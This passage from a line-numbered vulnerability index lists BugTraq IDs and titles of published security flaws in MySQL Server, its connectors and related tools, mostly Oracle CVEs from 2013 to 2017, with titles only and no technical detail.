20794| [101314] Oracle MySQL Server CVE-2017-10314 Remote Security Vulnerability
20795| [99810] Oracle MySQL Server CVE-2017-3653 Remote Security Vulnerability
20796| [99808] Oracle MySQL Server CVE-2017-3650 Remote Security Vulnerability
20797| [99805] Oracle MySQL Server CVE-2017-3652 Remote Security Vulnerability
20798| [99802] Oracle MySQL Server CVE-2017-3651 Remote Security Vulnerability
20799| [99799] Oracle MySQL Server CVE-2017-3649 Remote Security Vulnerability
20800| [99796] Oracle MySQL Server CVE-2017-3647 Remote Security Vulnerability
20801| [99789] Oracle MySQL Server CVE-2017-3648 Remote Security Vulnerability
20802| [99786] Oracle MySQL Server CVE-2017-3646 Remote Security Vulnerability
20803| [99783] Oracle MySQL Server CVE-2017-3645 Remote Security Vulnerability
20804| [99779] Oracle MySQL Server CVE-2017-3642 Remote Security Vulnerability
20805| [99778] Oracle MySQL Server CVE-2017-3638 Remote Security Vulnerability
20806| [99775] Oracle MySQL Server CVE-2017-3644 Remote Security Vulnerability
20807| [99772] Oracle MySQL Server CVE-2017-3643 Remote Security Vulnerability
20808| [99767] Oracle MySQL Server CVE-2017-3641 Remote Security Vulnerability
20809| [99765] Oracle MySQL Server CVE-2017-3640 Remote Security Vulnerability
20810| [99753] Oracle MySQL Server CVE-2017-3639 Remote Security Vulnerability
20811| [99748] Oracle MySQL Server CVE-2017-3637 Remote Security Vulnerability
20812| [99746] Oracle MySQL Server CVE-2017-3529 Remote Security Vulnerability
20813| [99736] Oracle MySQL Server CVE-2017-3636 Local Security Vulnerability
20814| [99730] Oracle MySQL Connectors/MySQL Server CVE-2017-3635 Remote Security Vulnerability
20815| [99729] Oracle MySQL Server CVE-2017-3634 Remote Security Vulnerability
20816| [99722] Oracle MySQL Server CVE-2017-3633 Remote Security Vulnerability
20817| [99374] Perl DBD::mysql Module CVE-2017-10788 Use After Free Denial of Service Vulnerability
20818| [99364] Perl DBD::mysql Module CVE-2017-10789 Man in the Middle Security Bypass Vulnerability
20819| [97982] Oracle MySQL Connectors CVE-2017-3523 Remote Security Vulnerability
20820| [97960] MySQL-GUI-tools CVE-2010-4178 Local Information Disclosure Vulnerability
20821| [97959] MySQL-GUI-tools CVE-2010-4177 Local Information Disclosure Vulnerability
20822| [97851] Oracle MySQL Server CVE-2017-3462 Remote Security Vulnerability
20823| [97849] Oracle MySQL Server CVE-2017-3463 Remote Security Vulnerability
20824| [97848] Oracle MySQL Server CVE-2017-3468 Remote Security Vulnerability
20825| [97847] Oracle MySQL Server CVE-2017-3459 Remote Security Vulnerability
20826| [97845] Oracle MySQL Server CVE-2017-3457 Remote Security Vulnerability
20827| [97844] Oracle MySQL Enterprise Monitor CVE-2017-3307 Remote Security Vulnerability
20828| [97840] Oracle MySQL Connectors CVE-2017-3590 Local Security Vulnerability
20829| [97837] Oracle MySQL Server CVE-2017-3458 Remote Security Vulnerability
20830| [97836] Oracle MySQL Connectors CVE-2017-3589 Local Security Vulnerability
20831| [97833] Oracle MySQL Workbench CVE-2017-3469 Remote Security Vulnerability
20832| [97831] Oracle MySQL Server CVE-2017-3456 Remote Security Vulnerability
20833| [97826] Oracle MySQL Server CVE-2017-3460 Remote Security Vulnerability
20834| [97825] Oracle MySQL Server CVE-2017-3467 Remote Security Vulnerability
20835| [97822] Oracle MySQL Server CVE-2017-3465 Remote Security Vulnerability
20836| [97820] Oracle MySQL Server CVE-2017-3455 Remote Security Vulnerability
20837| [97818] Oracle MySQL Server CVE-2017-3464 Remote Security Vulnerability
20838| [97815] Oracle MySQL Cluster CVE-2017-3304 Remote Security Vulnerability
20839| [97812] Oracle MySQL Server CVE-2017-3461 Remote Security Vulnerability
20840| [97791] Oracle MySQL Server CVE-2017-3454 Remote Security Vulnerability
20841| [97784] Oracle MySQL Connectors CVE-2017-3586 Remote Security Vulnerability
20842| [97779] Oracle MySQL Server CVE-2017-3452 Remote Security Vulnerability
20843| [97776] Oracle MySQL Server CVE-2017-3453 Remote Security Vulnerability
20844| [97772] Oracle MySQL Server CVE-2017-3331 Remote Security Vulnerability
20845| [97765] Oracle MySQL Server CVE-2017-3600 Remote Security Vulnerability
20846| [97763] Oracle MySQL Server CVE-2017-3329 Remote Security Vulnerability
20847| [97754] Oracle MySQL Server CVE-2017-3599 Remote Security Vulnerability
20848| [97747] Oracle MySQL Server CVE-2017-3450 Remote Security Vulnerability
20849| [97742] Oracle MySQL Server CVE-2017-3309 Remote Security Vulnerability
20850| [97725] Oracle MySQL Server CVE-2017-3308 Remote Security Vulnerability
20851| [97724] Oracle MySQL Enterprise Monitor CVE-2017-3306 Remote Security Vulnerability
20852| [97023] MySQL CVE-2017-3305 Man in the Middle Security Bypass Vulnerability
20853| [96300] PHP 'ext/mysqli/mysqli.c' Denial of Service Vulnerability
20854| [96162] MariaDB and MySQL CVE-2017-3302 Denial of Service Vulnerability
20855| [95592] Oracle MySQL Cluster CVE-2016-5541 Remote Security Vulnerability
20856| [95589] Oracle MySQL Server CVE-2017-3257 Remote Security Vulnerability
20857| [95588] Oracle MySQL Server CVE-2017-3318 Local Security Vulnerability
20858| [95585] Oracle MySQL Server CVE-2017-3317 Local Security Vulnerability
20859| [95583] Oracle MySQL Server CVE-2017-3273 Remote Security Vulnerability
20860| [95580] Oracle MySQL Server CVE-2016-8318 Remote Security Vulnerability
20861| [95575] Oracle MySQL Cluster CVE-2017-3323 Remote Security Vulnerability
20862| [95574] Oracle MySQL Cluster CVE-2017-3322 Remote Security Vulnerability
20863| [95571] Oracle MySQL Server CVE-2017-3238 Remote Security Vulnerability
20864| [95565] Oracle MySQL Server CVE-2017-3244 Remote Security Vulnerability
20865| [95562] Oracle MySQL Cluster CVE-2017-3321 Remote Security Vulnerability
20866| [95560] Oracle MySQL Server CVE-2017-3258 Remote Security Vulnerability
20867| [95542] Oracle MySQL Enterprise Monitor CVE-2016-5590 Remote Security Vulnerability
20868| [95538] Oracle MySQL Server CVE-2017-3243 Remote Security Vulnerability
20869| [95527] Oracle MySQL Server CVE-2017-3313 Local Security Vulnerability
20870| [95520] Oracle MySQL Server CVE-2017-3265 Local Security Vulnerability
20871| [95501] Oracle MySQL Server CVE-2017-3291 Local Security Vulnerability
20872| [95491] Oracle MySQL Server CVE-2017-3312 Local Security Vulnerability
20873| [95486] Oracle MySQL Server CVE-2017-3256 Remote Security Vulnerability
20874| [95482] Oracle MySQL Server CVE-2017-3251 Remote Security Vulnerability
20875| [95479] Oracle MySQL Server CVE-2017-3319 Remote Security Vulnerability
20876| [95470] Oracle MySQL Server CVE-2017-3320 Remote Security Vulnerability
20877| [95146] Pivotal MySQL for PCF CVE-2016-0898 Information Disclosure Vulnerability
20878| [94350] DBD::mysql CVE-2016-1249 Out-Of-Bounds Read Information Disclosure Vulnerability
20879| [93755] Oracle MySQL CVE-2016-8284 Local Security Vulnerability
20880| [93745] Oracle MySQL CVE-2016-8286 Remote Security Vulnerability
20881| [93740] Oracle MySQL CVE-2016-8288 Remote Security Vulnerability
20882| [93737] Oracle MySQL CVE-2016-8283 Remote Security Vulnerability
20883| [93735] Oracle MySQL CVE-2016-5584 Remote Security Vulnerability
20884| [93733] Oracle MySQL CVE-2016-8290 Remote Security Vulnerability
20885| [93727] Oracle MySQL CVE-2016-8287 Remote Security Vulnerability
20886| [93720] Oracle MySQL CVE-2016-8289 Local Security Vulnerability
20887| [93715] Oracle MySQL CVE-2016-5635 Remote Security Vulnerability
20888| [93709] Oracle MySQL CVE-2016-5634 Remote Security Vulnerability
20889| [93702] Oracle MySQL CVE-2016-5633 Remote Security Vulnerability
20890| [93693] Oracle MySQL CVE-2016-5632 Remote Security Vulnerability
20891| [93684] Oracle MySQL CVE-2016-5631 Remote Security Vulnerability
20892| [93678] Oracle MySQL CVE-2016-5507 Remote Security Vulnerability
20893| [93674] Oracle MySQL CVE-2016-5630 Remote Security Vulnerability
20894| [93670] Oracle MySQL CVE-2016-3495 Remote Security Vulnerability
20895| [93668] Oracle MySQL CVE-2016-5629 Remote Security Vulnerability
20896| [93662] Oracle MySQL CVE-2016-5628 Remote Security Vulnerability
20897| [93659] Oracle MySQL CVE-2016-7440 Local Security Vulnerability
20898| [93653] Oracle MySQL Connector CVE-2016-5598 Remote Security Vulnerability
20899| [93650] Oracle MySQL CVE-2016-3492 Remote Security Vulnerability
20900| [93642] Oracle MySQL CVE-2016-5627 Remote Security Vulnerability
20901| [93638] Oracle MySQL CVE-2016-5626 Remote Security Vulnerability
20902| [93635] Oracle MySQL CVE-2016-5624 Remote Security Vulnerability
20903| [93630] Oracle MySQL CVE-2016-5612 Remote Security Vulnerability
20904| [93622] Oracle MySQL CVE-2016-5609 Remote Security Vulnerability
20905| [93617] Oracle MySQL CVE-2016-5625 Local Security Vulnerability
20906| [93614] RETIRED: Oracle MySQL CVE-2016-5616 Local Security Vulnerability
20907| [93612] Oracle MySQL CVE-2016-6664 Local Security Vulnerability
20908| [93480] Pivotal Cloud Foundry cf-mysql CVE-2016-6653 Information Disclosure Vulnerability
20909| [93337] perl-DBD-MySQL CVE-2016-1246 Remote Buffer Overflow Vulnerability
20910| [92912] Oracle MySQL CVE-2016-6662 Remote Code Execution Vulnerability
20911| [92911] Oracle MySQL CVE-2016-6663 Unspecified Security Vulnerability
20912| [92149] DBD::mysql CVE-2014-9906 Incomplete Fix Use After Free Remote Code Execution Vulnerability
20913| [92118] DBD::mysql 'my_login()' Function Use After Free Remote Code Execution Vulnerability
20914| [91999] Oracle MySQL CVE-2016-3452 Remote Security Vulnerability
20915| [91992] Oracle MySQL CVE-2016-3614 Remote Security Vulnerability
20916| [91987] Oracle MySQL CVE-2016-5444 Remote Security Vulnerability
20917| [91983] Oracle MySQL CVE-2016-3588 Remote Security Vulnerability
20918| [91980] Oracle MySQL CVE-2016-3486 Remote Security Vulnerability
20919| [91976] Oracle MySQL CVE-2016-3424 Remote Security Vulnerability
20920| [91974] Oracle MySQL CVE-2016-5442 Remote Security Vulnerability
20921| [91969] Oracle MySQL CVE-2016-5439 Remote Security Vulnerability
20922| [91967] Oracle MySQL CVE-2016-3518 Remote Security Vulnerability
20923| [91963] Oracle MySQL CVE-2016-5443 Local Security Vulnerability
20924| [91960] Oracle MySQL CVE-2016-3615 Remote Security Vulnerability
20925| [91953] Oracle MySQL CVE-2016-5440 Remote Security Vulnerability
20926| [91949] Oracle MySQL CVE-2016-3501 Remote Security Vulnerability
20927| [91943] Oracle MySQL CVE-2016-3459 Remote Security Vulnerability
20928| [91932] Oracle MySQL CVE-2016-3521 Remote Security Vulnerability
20929| [91917] Oracle MySQL CVE-2016-5437 Remote Security Vulnerability
20930| [91915] Oracle MySQL CVE-2016-5441 Remote Security Vulnerability
20931| [91913] Oracle MySQL CVE-2016-3471 Local Security Vulnerability
20932| [91910] Oracle MySQL CVE-2016-3440 Remote Security Vulnerability
20933| [91906] Oracle MySQL CVE-2016-5436 Remote Security Vulnerability
20934| [91902] Oracle MySQL CVE-2016-3477 Local Security Vulnerability
20935| [90165] MySQL CVE-2005-0799 Denial-Of-Service Vulnerability
20936| [89812] xMySQLadmin CVE-2005-1944 Local Security Vulnerability
20937| [89412] MySQL CVE-2005-2573 Directory Traversal Vulnerability
20938| [88627] MySQL CVE-1999-1188 Local Security Vulnerability
20939| [88032] MySQL CVE-2001-1275 Local Security Vulnerability
20940| [87310] Btsavemysql CVE-2006-6378 Remote Security Vulnerability
20941| [86999] MySQL CVE-2001-1274 Denial-Of-Service Vulnerability
20942| [86513] Oracle MySQL CVE-2016-0665 Remote Security Vulnerability
20943| [86511] Oracle MySQL CVE-2016-0661 Remote Security Vulnerability
20944| [86509] Oracle MySQL CVE-2016-0666 Remote Security Vulnerability
20945| [86506] Oracle MySQL CVE-2016-0662 Remote Security Vulnerability
20946| [86504] Oracle MySQL CVE-2016-0654 Remote Security Vulnerability
20947| [86501] Oracle MySQL CVE-2016-0651 Remote Security Vulnerability
20948| [86498] Oracle MySQL CVE-2016-0649 Remote Security Vulnerability
20949| [86496] Oracle MySQL CVE-2016-0650 Remote Security Vulnerability
20950| [86495] Oracle MySQL CVE-2016-0647 Remote Security Vulnerability
20951| [86493] Oracle MySQL CVE-2016-0659 Remote Security Vulnerability
20952| [86489] Oracle MySQL CVE-2016-3461 Remote Security Vulnerability
20953| [86486] Oracle MySQL CVE-2016-0643 Remote Security Vulnerability
20954| [86484] Oracle MySQL CVE-2016-0667 Remote Security Vulnerability
20955| [86470] Oracle MySQL CVE-2016-0641 Remote Security Vulnerability
20956| [86467] Oracle MySQL CVE-2016-0668 Remote Security Vulnerability
20957| [86463] Oracle MySQL CVE-2016-0658 Remote Security Vulnerability
20958| [86457] Oracle MySQL CVE-2016-0648 Remote Security Vulnerability
20959| [86454] Oracle MySQL CVE-2016-0652 Remote Security Vulnerability
20960| [86451] Oracle MySQL CVE-2016-0663 Remote Security Vulnerability
20961| [86445] Oracle MySQL CVE-2016-0642 Remote Security Vulnerability
20962| [86442] Oracle MySQL CVE-2016-0644 Remote Security Vulnerability
20963| [86439] Oracle MySQL CVE-2016-0653 Remote Security Vulnerability
20964| [86436] Oracle MySQL CVE-2016-0646 Remote Security Vulnerability
20965| [86433] Oracle MySQL CVE-2016-0657 Remote Security Vulnerability
20966| [86431] Oracle MySQL CVE-2016-0656 Remote Security Vulnerability
20967| [86427] Oracle MySQL CVE-2016-0640 Remote Security Vulnerability
20968| [86424] Oracle MySQL CVE-2016-0655 Remote Security Vulnerability
20969| [86418] Oracle MySQL CVE-2016-0639 Remote Security Vulnerability
20970| [85985] MariaDB and MySQL CVE-2015-5969 Local Information Disclosure Vulnerability
20971| [85262] MySQL CVE-2007-5970 Remote Security Vulnerability
20972| [85246] Mysql Community Server CVE-2007-6313 Remote Security Vulnerability
20973| [85215] Mysql Banner Exchange CVE-2007-6512 Denial-Of-Service Vulnerability
20974| [83639] MySQLDumper CVE-2006-5264 Cross-Site Scripting Vulnerability
20975| [83232] MySQL Connector/Net CVE-2006-4227 Remote Security Vulnerability
20976| [83194] MySQL CVE-2004-0628 Denial Of Service Vulnerability
20977| [82913] MySQL CVE-2001-1453 Remote Security Vulnerability
20978| [82911] MySQL CVE-2001-1454 Remote Security Vulnerability
20979| [81810] MariaDB/MySQL/Percona Server CVE-2016-2047 SSL Certificate Validation Security Bypass Vulnerability
20980| [81258] Oracle MySQL CVE-2016-0609 Remote Security Vulnerability
20981| [81253] Oracle MySQL CVE-2016-0605 Remote Security Vulnerability
20982| [81245] Oracle MySQL CVE-2015-7744 Remote Security Vulnerability
20983| [81238] Oracle MySQL CVE-2016-0607 Remote Security Vulnerability
20984| [81226] Oracle MySQL CVE-2016-0608 Remote Security Vulnerability
20985| [81211] Oracle MySQL CVE-2016-0601 Remote Security Vulnerability
20986| [81203] Oracle MySQL CVE-2016-0599 Remote Security Vulnerability
20987| [81198] Oracle MySQL CVE-2016-0610 Remote Security Vulnerability
20988| [81188] Oracle MySQL CVE-2016-0600 Remote Security Vulnerability
20989| [81182] Oracle MySQL CVE-2016-0598 Remote Security Vulnerability
20990| [81176] Oracle MySQL CVE-2016-0616 Remote Security Vulnerability
20991| [81164] Oracle MySQL CVE-2016-0611 Remote Security Vulnerability
20992| [81151] Oracle MySQL CVE-2016-0597 Remote Security Vulnerability
20993| [81136] Oracle MySQL CVE-2016-0502 Remote Security Vulnerability
20994| [81130] Oracle MySQL CVE-2016-0596 Remote Security Vulnerability
20995| [81126] Oracle MySQL CVE-2016-0503 Remote Security Vulnerability
20996| [81121] Oracle MySQL CVE-2016-0595 Remote Security Vulnerability
20997| [81108] Oracle MySQL CVE-2016-0594 Remote Security Vulnerability
20998| [81088] Oracle MySQL CVE-2016-0505 Remote Security Vulnerability
20999| [81077] Oracle MySQL CVE-2016-0504 Remote Security Vulnerability
21000| [81066] Oracle MySQL CVE-2016-0546 Local Security Vulnerability
21001| [79408] Mysql-Ocaml CVE-2009-2942 Remote Security Vulnerability
21002| [79044] kiddog_mysqldumper CVE-2010-0336 Information Disclosure Vulnerability
21003| [78373] MySQL CVE-2011-5049 Denial-Of-Service Vulnerability
21004| [77237] Oracle MySQL Server CVE-2015-4826 Remote Security Vulnerability
21005| [77234] Oracle MySQL Server CVE-2015-4910 Remote Security Vulnerability
21006| [77232] Oracle MySQL Server CVE-2015-4766 Local Security Vulnerability
21007| [77231] Oracle MySQL Server CVE-2015-4890 Remote Security Vulnerability
21008| [77228] Oracle MySQL Server CVE-2015-4830 Remote Security Vulnerability
21009| [77222] Oracle MySQL Server CVE-2015-4815 Remote Security Vulnerability
21010| [77219] Oracle MySQL Server CVE-2015-4904 Remote Security Vulnerability
21011| [77216] Oracle MySQL Server CVE-2015-4800 Remote Security Vulnerability
21012| [77213] Oracle MySQL Server CVE-2015-4791 Remote Security Vulnerability
21013| [77208] Oracle MySQL Server CVE-2015-4870 Remote Security Vulnerability
21014| [77205] Oracle MySQL Server CVE-2015-4807 Remote Security Vulnerability
21015| [77199] Oracle MySQL Server CVE-2015-4730 Remote Security Vulnerability
21016| [77196] Oracle MySQL Server CVE-2015-4819 Local Security Vulnerability
21017| [77190] Oracle MySQL Server CVE-2015-4836 Remote Security Vulnerability
21018| [77187] Oracle MySQL Server CVE-2015-4864 Remote Security Vulnerability
21019| [77171] Oracle MySQL Server CVE-2015-4792 Remote Security Vulnerability
21020| [77170] Oracle MySQL Server CVE-2015-4833 Remote Security Vulnerability
21021| [77165] Oracle MySQL Server CVE-2015-4802 Remote Security Vulnerability
21022| [77153] Oracle MySQL Server CVE-2015-4913 Remote Security Vulnerability
21023| [77147] Oracle MySQL Server CVE-2015-4862 Remote Security Vulnerability
21024| [77145] Oracle MySQL Server CVE-2015-4858 Remote Security Vulnerability
21025| [77143] Oracle MySQL Server CVE-2015-4905 Remote Security Vulnerability
21026| [77140] Oracle MySQL Server CVE-2015-4879 Remote Security Vulnerability
21027| [77137] Oracle MySQL Server CVE-2015-4861 Remote Security Vulnerability
21028| [77136] Oracle MySQL Server CVE-2015-4895 Remote Security Vulnerability
21029| [77134] Oracle MySQL Server CVE-2015-4816 Remote Security Vulnerability
21030| [77132] Oracle MySQL Server CVE-2015-4866 Remote Security Vulnerability
21031| [77015] Oracle MySQL Multiple Buffer Overflow Vulnerabilities
21032| [75849] Oracle MySQL Server CVE-2015-4752 Remote Security Vulnerability
21033| [75844] Oracle MySQL Server CVE-2015-4767 Remote Security Vulnerability
21034| [75837] Oracle MySQL Server CVE-2015-2620 Remote Security Vulnerability
21035| [75835] Oracle MySQL Server CVE-2015-4771 Remote Security Vulnerability
21036| [75830] Oracle MySQL Server CVE-2015-2643 Remote Security Vulnerability
21037| [75822] Oracle MySQL Server CVE-2015-2648 Remote Security Vulnerability
21038| [75815] Oracle MySQL Server CVE-2015-2641 Remote Security Vulnerability
21039| [75813] Oracle MySQL Server CVE-2015-2661 Local Security Server Vulnerability
21040| [75802] Oracle MySQL Server CVE-2015-4737 Remote Security Vulnerability
21041| [75785] Oracle MySQL Server CVE-2015-4756 Remote Security Vulnerability
21042| [75781] Oracle MySQL Server CVE-2015-4772 Remote Security Vulnerability
21043| [75774] Oracle MySQL Server CVE-2015-2617 Remote Security Vulnerability
21044| [75770] Oracle MySQL Server CVE-2015-4761 Remote Security Vulnerability
21045| [75762] Oracle MySQL Server CVE-2015-2611 Remote Security Vulnerability
21046| [75760] Oracle MySQL Server CVE-2015-2639 Remote Security Vulnerability
21047| [75759] Oracle MySQL Server CVE-2015-4757 Remote Security Vulnerability
21048| [75753] Oracle MySQL Server CVE-2015-4769 Remote Security Vulnerability
21049| [75751] Oracle MySQL Server CVE-2015-2582 Remote Security Vulnerability
21050| [75397] MySql Lite Administrator Multiple Cross Site Scripting Vulnerabilities
21051| [75394] WordPress wp-instance-rename Plugin 'mysqldump_download.php' Arbitrary File Download Vulnerability
21052| [74695] Tiny MySQL 'tinymy.php' Cross Site Scripting Vulnerability
21053| [74398] Oracle MySQL CVE-2015-3152 SSL Certificate Validation Security Bypass Vulnerability
21054| [74137] Oracle MySQL Utilities CVE-2015-2576 Local Security Vulnerability
21055| [74133] Oracle MySQL Server CVE-2015-0498 Remote Security Vulnerability
21056| [74130] Oracle MySQL Server CVE-2015-0511 Remote Security Vulnerability
21057| [74126] Oracle MySQL Server CVE-2015-2566 Remote Security Vulnerability
21058| [74123] Oracle MySQL Server CVE-2015-2567 Remote Security Vulnerability
21059| [74121] Oracle MySQL Server CVE-2015-0507 Remote Security Vulnerability
21060| [74120] Oracle MySQL Server CVE-2015-0506 Remote Security Vulnerability
21061| [74115] Oracle MySQL Server CVE-2015-0499 Remote Security Vulnerability
21062| [74112] Oracle MySQL Server CVE-2015-0505 Remote Security Vulnerability
21063| [74110] Oracle MySQL Server CVE-2015-0405 Remote Security Vulnerability
21064| [74103] Oracle MySQL Server CVE-2015-0441 Remote Security Vulnerability
21065| [74102] Oracle MySQL Server CVE-2015-0503 Remote Security Vulnerability
21066| [74098] Oracle MySQL Server CVE-2015-0438 Remote Security Vulnerability
21067| [74095] Oracle MySQL Server CVE-2015-2571 Remote Security Vulnerability
21068| [74091] Oracle MySQL Server CVE-2015-0423 Remote Security Vulnerability
21069| [74089] Oracle MySQL Server CVE-2015-0433 Remote Security Vulnerability
21070| [74086] Oracle MySQL Server CVE-2015-0508 Remote Security Vulnerability
21071| [74085] Oracle MySQL Server CVE-2015-0439 Remote Security Vulnerability
21072| [74081] Oracle MySQL Server CVE-2015-0500 Remote Security Vulnerability
21073| [74078] Oracle MySQL Server CVE-2015-2573 Remote Security Vulnerability
21074| [74075] Oracle MySQL Connectors CVE-2015-2575 Remote Security Vulnerability
21075| [74073] Oracle MySQL Server CVE-2015-2568 Remote Security Vulnerability
21076| [74070] Oracle MySQL Server CVE-2015-0501 Remote Security Vulnerability
21077| [72728] RubyGems xaviershay-dm-rails 'storage.rb' MySQL Credential Information Disclosure Vulnerability
21078| [72229] Oracle MySQL Server CVE-2015-0385 Remote Security Vulnerability
21079| [72227] Oracle MySQL Server CVE-2015-0374 Remote Security Vulnerability
21080| [72223] Oracle MySQL Server CVE-2015-0409 Remote Security Vulnerability
21081| [72217] Oracle MySQL Server CVE-2015-0432 Remote Security Vulnerability
21082| [72214] Oracle MySQL Server CVE-2015-0381 Remote Security Vulnerability
21083| [72210] Oracle MySQL Server CVE-2014-6568 Remote Security Vulnerability
21084| [72205] Oracle MySQL Server CVE-2015-0391 Remote Security Vulnerability
21085| [72200] Oracle MySQL Server CVE-2015-0382 Remote Security Vulnerability
21086| [72191] Oracle MySQL Server CVE-2015-0411 Remote Security Vulnerability
21087| [70550] Oracle MySQL Server CVE-2014-6507 Remote Security Vulnerability
21088| [70540] RETIRED: Oracle MySQL Server CVE-2012-5615 Remote Security Vulnerability
21089| [70532] Oracle MySQL Server CVE-2014-6463 Remote Security Vulnerability
21090| [70530] Oracle MySQL Server CVE-2014-6555 Remote Security Vulnerability
21091| [70525] Oracle MySQL Server CVE-2014-6489 Remote Security Vulnerability
21092| [70517] Oracle MySQL Server CVE-2014-4287 Remote Security Vulnerability
21093| [70516] Oracle MySQL Server CVE-2014-6505 Remote Security Vulnerability
21094| [70511] Oracle MySQL Server CVE-2014-6564 Remote Security Vulnerability
21095| [70510] Oracle MySQL Server CVE-2014-6520 Remote Security Vulnerability
21096| [70497] Oracle MySQL Server CVE-2014-6494 Remote Security Vulnerability
21097| [70496] Oracle MySQL Server CVE-2014-6495 Remote Security Vulnerability
21098| [70489] Oracle MySQL Server CVE-2014-6478 Remote Security Vulnerability
21099| [70487] Oracle MySQL Server CVE-2014-6559 Remote Security Vulnerability
21100| [70486] Oracle MySQL Server CVE-2014-6530 Remote Security Vulnerability
21101| [70478] Oracle MySQL Server CVE-2014-6500 Remote Security Vulnerability
21102| [70469] Oracle MySQL Server CVE-2014-6496 Remote Security Vulnerability
21103| [70462] Oracle MySQL Server CVE-2014-6551 Local Security Vulnerability
21104| [70455] Oracle MySQL Server CVE-2014-6484 Remote Security Vulnerability
21105| [70451] Oracle MySQL Server CVE-2014-6464 Remote Security Vulnerability
21106| [70448] Oracle MySQL Server CVE-2014-6474 Remote Security Vulnerability
21107| [70446] Oracle MySQL Server CVE-2014-6469 Remote Security Vulnerability
21108| [70444] Oracle MySQL Server CVE-2014-6491 Remote Security Vulnerability
21109| [69743] Oracle MySQL Client yaSSL Certificate Decode Buffer Overflow Vulnerability
21110| [69732] MySQL MyISAM Insecure Temporary File Creation Vulnerability
21111| [68736] RubyGems lean-ruport MySQL Credential Local Information Disclosure Vulnerability
21112| [68607] Oracle MySQL Server CVE-2014-4214 Remote Security Vulnerability
21113| [68602] Oracle MySQL Server CVE-2014-4240 Local Security Vulnerability
21114| [68598] Oracle MySQL Server CVE-2014-4233 Remote Security Vulnerability
21115| [68593] Oracle MySQL Server CVE-2014-4207 Remote Security Vulnerability
21116| [68587] Oracle MySQL Server CVE-2014-4238 Remote Security Vulnerability
21117| [68579] Oracle MySQL Server CVE-2014-2494 Remote Security Vulnerability
21118| [68573] Oracle MySQL Server CVE-2014-4260 Remote Security Vulnerability
21119| [68564] Oracle MySQL Server CVE-2014-4258 Remote Security Vulnerability
21120| [66896] Oracle MySQL Server CVE-2014-2436 Remote Security Vulnerability
21121| [66890] Oracle MySQL Server CVE-2014-2431 Remote Security Vulnerability
21122| [66885] Oracle MySQL Server CVE-2014-2444 Remote Security Vulnerability
21123| [66880] Oracle MySQL Server CVE-2014-2419 Remote Security Vulnerability
21124| [66872] Oracle MySQL Server CVE-2014-2434 Remote Security Vulnerability
21125| [66863] Oracle MySQL Server CVE-2014-2450 Remote Security Vulnerability
21126| [66858] Oracle MySQL Server CVE-2014-2430 Remote Security Vulnerability
21127| [66853] Oracle MySQL Server CVE-2014-2435 Remote Security Vulnerability
21128| [66850] Oracle MySQL Client CVE-2014-2440 Remote Security Vulnerability
21129| [66846] Oracle MySQL Server CVE-2014-2438 Remote Security Vulnerability
21130| [66835] Oracle MySQL Server CVE-2014-0384 Remote Security Vulnerability
21131| [66828] Oracle MySQL Server CVE-2014-2451 Remote Security Vulnerability
21132| [66823] Oracle MySQL Server CVE-2014-2442 Remote Security Vulnerability
21133| [66153] lighttpd 'mod_mysql_vhost.c' SQL Injection Vulnerability
21134| [65890] InterWorx MySQL Password Information Disclosure Vulnerability
21135| [65621] Percona Toolkit for MySQL Automatic Version Check Information Disclosure Vulnerability
21136| [65298] Oracle MySQL Client 'main()' Function Buffer Overflow Vulnerability
21137| [64908] Oracle MySQL Server CVE-2014-0402 Remote Security Vulnerability
21138| [64904] Oracle MySQL Server CVE-2014-0386 Remote Security Vulnerability
21139| [64898] Oracle MySQL Server CVE-2014-0401 Remote Security Vulnerability
21140| [64897] Oracle MySQL Server CVE-2014-0431 Remote Security Vulnerability
21141| [64896] Oracle MySQL Server CVE-2013-5908 Remote Security Vulnerability
21142| [64895] Oracle MySQL Server CVE-2014-0433 Remote Security Vulnerability
21143| [64893] Oracle MySQL Server CVE-2014-0430 Remote Security Vulnerability
21144| [64891] Oracle MySQL Server CVE-2013-5891 Remote Security Vulnerability
21145| [64888] Oracle MySQL Server CVE-2014-0420 Remote Security Vulnerability
21146| [64885] Oracle MySQL Server CVE-2013-5881 Remote Security Vulnerability
21147| [64880] Oracle MySQL Server CVE-2014-0412 Remote Security Vulnerability
21148| [64877] Oracle MySQL Server CVE-2014-0393 Remote Security Vulnerability
21149| [64873] Oracle MySQL Server CVE-2013-5894 Remote Security Vulnerability
21150| [64868] Oracle MySQL Server CVE-2014-0427 Remote Security Vulnerability
21151| [64864] Oracle MySQL Server CVE-2013-5860 Remote Security Vulnerability
21152| [64854] Oracle MySQL Server CVE-2013-5882 Remote Security Vulnerability
21153| [64849] Oracle MySQL Server CVE-2014-0437 Remote Security Vulnerability
21154| [64731] CSP MySQL User Manager 'login.php' Script SQL Injection Vulnerability
21155| [64630] Zen Cart 'mysql_zencart.sql' Information Disclosure Vulnerability
21156| [63125] Oracle MySQL Server CVE-2012-2750 Remote Security Vulnerability
21157| [63119] Oracle MySQL Server CVE-2013-5770 Remote Security Vulnerability
21158| [63116] Oracle MySQL Server CVE-2013-5793 Remote Security Vulnerability
21159| [63113] Oracle MySQL Server CVE-2013-5767 Remote Security Vulnerability
21160| [63109] Oracle MySQL Server CVE-2013-3839 Remote Security Vulnerability
21161| [63107] Oracle MySQL Server CVE-2013-5786 Remote Security Vulnerability
21162| [63105] Oracle MySQL Server CVE-2013-5807 Remote Security Vulnerability
21163| [62358] Oracle MySQL CVE-2005-2572 Remote Code Execution Vulnerability
21164| [61274] Oracle MySQL Server CVE-2013-3798 Remote Security Vulnerability
21165| [61272] Oracle MySQL Server CVE-2013-3809 Remote Security Vulnerability
21166| [61269] Oracle MySQL Server CVE-2013-3801 Remote Security Vulnerability
21167| [61264] Oracle MySQL Server CVE-2013-3793 Remote Security Vulnerability
21168| [61260] Oracle MySQL Server CVE-2013-3804 Remote Security Vulnerability
21169| [61256] Oracle MySQL Server CVE-2013-3805 Remote Security Vulnerability
21170| [61252] Oracle MySQL Server CVE-2013-3811 Remote Security Vulnerability
21171| [61249] Oracle MySQL Server CVE-2013-3812 Remote Security Vulnerability
21172| [61244] Oracle MySQL Server CVE-2013-3802 Remote Security Vulnerability
21173| [61241] Oracle MySQL Server CVE-2013-3795 Remote Security Vulnerability
21174| [61238] Oracle MySQL Server CVE-2013-3807 Remote Security Vulnerability
21175| [61235] Oracle MySQL Server CVE-2013-3806 Remote Security Vulnerability
21176| [61233] Oracle MySQL Server CVE-2013-3796 Remote Security Vulnerability
21177| [61227] Oracle MySQL Server CVE-2013-3808 Remote Security Vulnerability
21178| [61222] Oracle MySQL Server CVE-2013-3794 Remote Security Vulnerability
21179| [61214] Oracle MySQL Server CVE-2013-3810 Remote Security Vulnerability
